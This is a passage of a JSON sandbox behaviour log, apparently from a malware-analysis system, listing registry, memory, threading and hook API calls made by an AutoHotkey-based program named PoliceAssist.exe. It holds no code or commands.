            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000002a8"
              },
              {
                "name": "ValueName",
                "value": "RelativePath"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\RelativePath"
              }
            ],
            "repeated": 0,
            "id": 614
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000002a8"
              },
              {
                "name": "ValueName",
                "value": "ParsingName"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\ParsingName"
              }
            ],
            "repeated": 0,
            "id": 615
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000002a8"
              },
              {
                "name": "ValueName",
                "value": "InfoTip"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\InfoTip"
              }
            ],
            "repeated": 0,
            "id": 616
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000002a8"
              },
              {
                "name": "ValueName",
                "value": "LocalizedName"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\LocalizedName"
              }
            ],
            "repeated": 0,
            "id": 617
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000002a8"
              },
              {
                "name": "ValueName",
                "value": "Icon"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Icon"
              }
            ],
            "repeated": 0,
            "id": 618
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000002a8"
              },
              {
                "name": "ValueName",
                "value": "Security"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Security"
              }
            ],
            "repeated": 0,
            "id": 619
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000002a8"
              },
              {
                "name": "ValueName",
                "value": "StreamResource"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\StreamResource"
              }
            ],
            "repeated": 0,
            "id": 620
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000002a8"
              },
              {
                "name": "ValueName",
                "value": "StreamResourceType"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\StreamResourceType"
              }
            ],
            "repeated": 0,
            "id": 621
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000002a8"
              },
              {
                "name": "ValueName",
                "value": "LocalRedirectOnly"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\LocalRedirectOnly"
              }
            ],
            "repeated": 0,
            "id": 622
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000002a8"
              },
              {
                "name": "ValueName",
                "value": "Roamable"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Roamable"
              }
            ],
            "repeated": 0,
            "id": 623
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000002a8"
              },
              {
                "name": "ValueName",
                "value": "PreCreate"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\PreCreate"
              }
            ],
            "repeated": 0,
            "id": 624
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000002a8"
              },
              {
                "name": "ValueName",
                "value": "Stream"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Stream"
              }
            ],
            "repeated": 0,
            "id": 625
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000002a8"
              },
              {
                "name": "ValueName",
                "value": "PublishExpandedPath"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\PublishExpandedPath"
              }
            ],
            "repeated": 0,
            "id": 626
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000002a8"
              },
              {
                "name": "ValueName",
                "value": "DefinitionFlags"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\DefinitionFlags"
              }
            ],
            "repeated": 0,
            "id": 627
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000002a8"
              },
              {
                "name": "ValueName",
                "value": "Attributes"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Attributes"
              }
            ],
            "repeated": 0,
            "id": 628
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000002a8"
              },
              {
                "name": "ValueName",
                "value": "FolderTypeID"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\FolderTypeID"
              }
            ],
            "repeated": 0,
            "id": 629
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000002a8"
              },
              {
                "name": "ValueName",
                "value": "InitFolderHandler"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\InitFolderHandler"
              }
            ],
            "repeated": 0,
            "id": 630
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x000002a8"
              },
              {
                "name": "SubKey",
                "value": "PropertyBag"
              },
              {
                "name": "Handle",
                "value": "0x000002a4"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\PropertyBag"
              }
            ],
            "repeated": 0,
            "id": 631
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000002a8"
              }
            ],
            "repeated": 0,
            "id": 632
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000290"
              }
            ],
            "repeated": 0,
            "id": 633
          },
          {
            "timestamp": "2025-11-20 10:58:28,406",
            "thread_id": "2188",
            "caller": "0x140005870",
            "parentcaller": "0x1400053d3",
            "category": "misc",
            "api": "SystemParametersInfoW",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "Action",
                "value": "0x00002000"
              },
              {
                "name": "uiParam",
                "value": "0x00000000"
              }
            ],
            "repeated": 0,
            "id": 634
          },
          {
            "timestamp": "2025-11-20 10:58:28,406",
            "thread_id": "2188",
            "caller": "0x140005893",
            "parentcaller": "0x1400053d3",
            "category": "misc",
            "api": "SystemParametersInfoW",
            "status": false,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Action",
                "value": "0x00002001"
              },
              {
                "name": "uiParam",
                "value": "0x00000000"
              }
            ],
            "repeated": 0,
            "id": 635
          },
          {
            "timestamp": "2025-11-20 10:58:28,406",
            "thread_id": "2188",
            "caller": "0x1400ca9ff",
            "parentcaller": "0x1400cbd5f",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x054cb000"
              },
              {
                "name": "RegionSize",
                "value": "0x00002000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 636
          },
          {
            "timestamp": "2025-11-20 10:58:28,406",
            "thread_id": "2188",
            "caller": "0x1400ca9ff",
            "parentcaller": "0x1400cbd5f",
            "category": "registry",
            "api": "NtOpenKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x0000029c"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000009",
                "pretty_value": "KEY_QUERY_VALUE|KEY_ENUMERATE_SUB_KEYS"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000000"
              },
              {
                "name": "ObjectAttributesName",
                "value": "\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\Session Manager"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session Manager"
              }
            ],
            "repeated": 0,
            "id": 637
          },
          {
            "timestamp": "2025-11-20 10:58:28,406",
            "thread_id": "2188",
            "caller": "0x1400ca9ff",
            "parentcaller": "0x1400cbd5f",
            "category": "registry",
            "api": "NtQueryValueKey",
            "status": false,
            "return": "0xffffffffc0000034",
            "pretty_return": "OBJECT_NAME_NOT_FOUND",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x0000029c"
              },
              {
                "name": "ValueName",
                "value": "ResourcePolicies"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Session Manager\\ResourcePolicies"
              }
            ],
            "repeated": 0,
            "id": 638
          },
          {
            "timestamp": "2025-11-20 10:58:28,406",
            "thread_id": "2188",
            "caller": "0x1400ca9ff",
            "parentcaller": "0x1400cbd5f",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000029c"
              }
            ],
            "repeated": 0,
            "id": 639
          },
          {
            "timestamp": "2025-11-20 10:58:28,406",
            "thread_id": "2188",
            "caller": "0x1400ca9ff",
            "parentcaller": "0x1400cbd5f",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x02d30000"
              },
              {
                "name": "RegionSize",
                "value": "0x0001a000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 640
          },
          {
            "timestamp": "2025-11-20 10:58:28,406",
            "thread_id": "2188",
            "caller": "0x1400ca9ff",
            "parentcaller": "0x1400cbd5f",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x02d30000"
              },
              {
                "name": "RegionSize",
                "value": "0x00001000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 641
          },
          {
            "timestamp": "2025-11-20 10:58:28,406",
            "thread_id": "2188",
            "caller": "0x1400ca9ff",
            "parentcaller": "0x1400cbd5f",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x054cd000"
              },
              {
                "name": "RegionSize",
                "value": "0x00002000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 642
          },
          {
            "timestamp": "2025-11-20 10:58:28,406",
            "thread_id": "2188",
            "caller": "0x1400ca9ff",
            "parentcaller": "0x1400cbd5f",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x05373000"
              },
              {
                "name": "RegionSize",
                "value": "0x00004000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 643
          },
          {
            "timestamp": "2025-11-20 10:58:28,406",
            "thread_id": "2188",
            "caller": "0x1400ca9ff",
            "parentcaller": "0x1400cbd5f",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x05377000"
              },
              {
                "name": "RegionSize",
                "value": "0x00021000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 644
          },
          {
            "timestamp": "2025-11-20 10:58:28,406",
            "thread_id": "2188",
            "caller": "0x1400ca9ff",
            "parentcaller": "0x1400cbd5f",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x05398000"
              },
              {
                "name": "RegionSize",
                "value": "0x00041000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 645
          },
          {
            "timestamp": "2025-11-20 10:58:28,406",
            "thread_id": "2188",
            "caller": "0x14000b81e",
            "parentcaller": "0x14000d2a6",
            "category": "threading",
            "api": "NtCreateThreadEx",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ThreadHandle",
                "value": "0x0000029c"
              },
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "StartAddress",
                "value": "0x14000bd10"
              },
              {
                "name": "Parameter",
                "value": "0x00000000"
              },
              {
                "name": "CreateFlags",
                "value": "0x00000001"
              },
              {
                "name": "ThreadId",
                "value": "3824"
              },
              {
                "name": "ProcessId",
                "value": "3308"
              },
              {
                "name": "Module",
                "value": "PoliceAssist.exe"
              }
            ],
            "repeated": 0,
            "id": 646
          },
          {
            "timestamp": "2025-11-20 10:58:28,406",
            "thread_id": "2188",
            "caller": "0x14000b81e",
            "parentcaller": "0x14000d2a6",
            "category": "threading",
            "api": "CreateRemoteThreadEx",
            "status": true,
            "return": "0x0000029c",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "StartRoutine",
                "value": "0x14000bd10"
              },
              {
                "name": "Parameter",
                "value": "0x00000000"
              },
              {
                "name": "CreationFlags",
                "value": "0x00000000"
              },
              {
                "name": "ThreadId",
                "value": "3824"
              },
              {
                "name": "ProcessId",
                "value": "3308"
              }
            ],
            "repeated": 0,
            "id": 647
          },
          {
            "timestamp": "2025-11-20 10:58:28,422",
            "thread_id": "2188",
            "caller": "0x14000b85a",
            "parentcaller": "0x14000d2a6",
            "category": "windows",
            "api": "PostThreadMessageW",
            "status": false,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessId",
                "value": "3308"
              },
              {
                "name": "ThreadId",
                "value": "3824"
              },
              {
                "name": "Message",
                "value": "1047"
              }
            ],
            "repeated": 0,
            "id": 648
          },
          {
            "timestamp": "2025-11-20 10:58:28,422",
            "thread_id": "2188",
            "caller": "0x14000b867",
            "parentcaller": "0x14000d2a6",
            "category": "system",
            "api": "NtDelayExecution",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Milliseconds",
                "value": "10"
              }
            ],
            "repeated": 0,
            "id": 649
          },
          {
            "timestamp": "2025-11-20 10:58:28,422",
            "thread_id": "3824",
            "caller": "0x7ffee34e507d",
            "parentcaller": "0x7ffee34e4c43",
            "category": "threading",
            "api": "NtTestAlert",
            "status": true,
            "return": "0x00000000",
            "arguments": [],
            "repeated": 0,
            "id": 650
          },
          {
            "timestamp": "2025-11-20 10:58:28,437",
            "thread_id": "2188",
            "caller": "0x14000b85a",
            "parentcaller": "0x14000d2a6",
            "category": "windows",
            "api": "PostThreadMessageW",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "ProcessId",
                "value": "3308"
              },
              {
                "name": "ThreadId",
                "value": "3824"
              },
              {
                "name": "Message",
                "value": "1047"
              }
            ],
            "repeated": 0,
            "id": 651
          },
          {
            "timestamp": "2025-11-20 10:58:28,437",
            "thread_id": "2188",
            "caller": "0x14000b98b",
            "parentcaller": "0x14000d2a6",
            "category": "system",
            "api": "NtDelayExecution",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Milliseconds",
                "value": "0"
              }
            ],
            "repeated": 6,
            "id": 652
          },
          {
            "timestamp": "2025-11-20 10:58:28,437",
            "thread_id": "3824",
            "caller": "0x14000c085",
            "parentcaller": "0x14000bd82",
            "category": "windows",
            "api": "FindWindowW",
            "status": false,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ClassName",
                "value": "#32771"
              },
              {
                "name": "WindowName",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 653
          },
          {
            "timestamp": "2025-11-20 10:58:28,437",
            "thread_id": "2188",
            "caller": "0x14000b98b",
            "parentcaller": "0x14000d2a6",
            "category": "system",
            "api": "NtDelayExecution",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Milliseconds",
                "value": "0"
              }
            ],
            "repeated": 0,
            "id": 654
          },
          {
            "timestamp": "2025-11-20 10:58:28,437",
            "thread_id": "3824",
            "caller": "0x14000bd9d",
            "parentcaller": "0x00000000",
            "category": "system",
            "api": "SetWindowsHookExW",
            "status": true,
            "return": "0x002a0147",
            "arguments": [
              {
                "name": "HookIdentifier",
                "value": "13",
                "pretty_value": "WH_KEYBOARD_LL"
              },
              {
                "name": "ProcedureAddress",
                "value": "0x140006970"
              },
              {
                "name": "ModuleAddress",
                "value": "0x140000000"
              },
              {
                "name": "ThreadId",
                "value": "0"
              }
            ],
            "repeated": 0,
            "id": 655
          },
          {
            "timestamp": "2025-11-20 10:58:28,437",
            "thread_id": "2188",
            "caller": "0x14000b98b",
            "parentcaller": "0x14000d2a6",
            "category": "system",
            "api": "NtDelayExecution",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Milliseconds",
                "value": "0"
              }
            ],
            "repeated": 0,
            "id": 656
          },
          {
            "timestamp": "2025-11-20 10:58:28,437",
            "thread_id": "3824",
            "caller": "0x14000be1b",
            "parentcaller": "0x00000000",
            "category": "system",
            "api": "SetWindowsHookExW",
            "status": true,
            "return": "0x001202cd",
            "arguments": [
              {
                "name": "HookIdentifier",
                "value": "14",
                "pretty_value": "WH_MOUSE_LL"
              },
              {
                "name": "ProcedureAddress",
                "value": "0x140006b90"
              },
              {
                "name": "ModuleAddress",
                "value": "0x140000000"
              },
              {
                "name": "ThreadId",
                "value": "0"
              }
            ],
            "repeated": 0,
            "id": 657
          },
          {
            "timestamp": "2025-11-20 10:58:28,437",
            "thread_id": "2188",
            "caller": "0x14000b98b",
            "parentcaller": "0x14000d2a6",
            "category": "system",
            "api": "NtDelayExecution",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Milliseconds",
                "value": "0"
              }
            ],
            "repeated": 0,
            "id": 658
          },
          {
            "timestamp": "2025-11-20 10:58:28,437",
            "thread_id": "3824",
            "caller": "0x14000be7c",
            "parentcaller": "0x00000000",
            "category": "windows",
            "api": "PostThreadMessageW",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "ProcessId",
                "value": "3308"
              },
              {
                "name": "ThreadId",
                "value": "2188"
              },
              {
                "name": "Message",
                "value": "1047"
              }
            ],
            "repeated": 0,
            "id": 659
          },
          {
            "timestamp": "2025-11-20 10:58:28,437",
            "thread_id": "2188",
            "caller": "0x14000ba3c",
            "parentcaller": "0x14000d2a6",
            "category": "synchronization",
            "api": "NtCreateMutant",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000002b0"
              },
              {
                "name": "MutexName",
                "value": "AHK Keybd"
              },
              {
                "name": "InitialOwner",
                "value": "0"
              }
            ],
            "repeated": 0,
            "id": 660
          },
          {
            "timestamp": "2025-11-20 10:58:28,437",
            "thread_id": "2188",
            "caller": "0x14000ba7f",
            "parentcaller": "0x14000d2a6",
            "category": "synchronization",
            "api": "NtCreateMutant",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000002b4"
              },
              {
                "name": "MutexName",
                "value": "AHK Mouse"
              },
              {
                "name": "InitialOwner",
                "value": "0"
              }
            ],
            "repeated": 0,
            "id": 661
          },
          {
            "timestamp": "2025-11-20 10:58:28,437",
            "thread_id": "2188",
            "caller": "0x1400ca9ff",
            "parentcaller": "0x14001f78e",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x053d9000"
              },
              {
                "name": "RegionSize",
                "value": "0x00016000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 662
          },
          {
            "timestamp": "2025-11-20 10:58:28,437",
            "thread_id": "2188",
            "caller": "0x1400ca9ff",
            "parentcaller": "0x14008a293",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x053ef000"
              },
              {
                "name": "RegionSize",
                "value": "0x00009000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 663
          },
          {
            "timestamp": "2025-11-20 10:58:28,437",
            "thread_id": "2188",
            "caller": "0x14007a95b",
            "parentcaller": "0x1400b1967",
            "category": "services",
            "api": "OpenSCManagerW",
            "status": true,
            "return": "0x008b4930",
            "arguments": [
              {
                "name": "MachineName",
                "value": ""
              },
              {
                "name": "DatabaseName",
                "value": ""
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000008",
                "pretty_value": "SC_MANAGER_LOCK"
              }
            ],
            "repeated": 0,
            "id": 664
          },
          {
            "timestamp": "2025-11-20 10:58:28,437",
            "thread_id": "2188",
            "caller": "0x14004e3fd",
            "parentcaller": "0x140036c64",
            "category": "process",
            "api": "NtOpenProcess",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0x000002bc"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000200",
                "pretty_value": "PROCESS_SET_INFORMATION"
              },
              {
                "name": "ProcessIdentifier",
                "value": "3308"
              }
            ],
            "repeated": 0,
            "id": 665
          },
          {
            "timestamp": "2025-11-20 10:58:28,437",
            "thread_id": "2188",
            "caller": "0x14004e410",
            "parentcaller": "0x140036c64",
            "category": "process",
            "api": "NtSetInformationProcess",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessInformationClass",
                "value": "18"
              },
              {
                "name": "ProcessInformation",
                "value": "\\x00\\x06"
              }
            ],
            "repeated": 0,
            "id": 666
          },
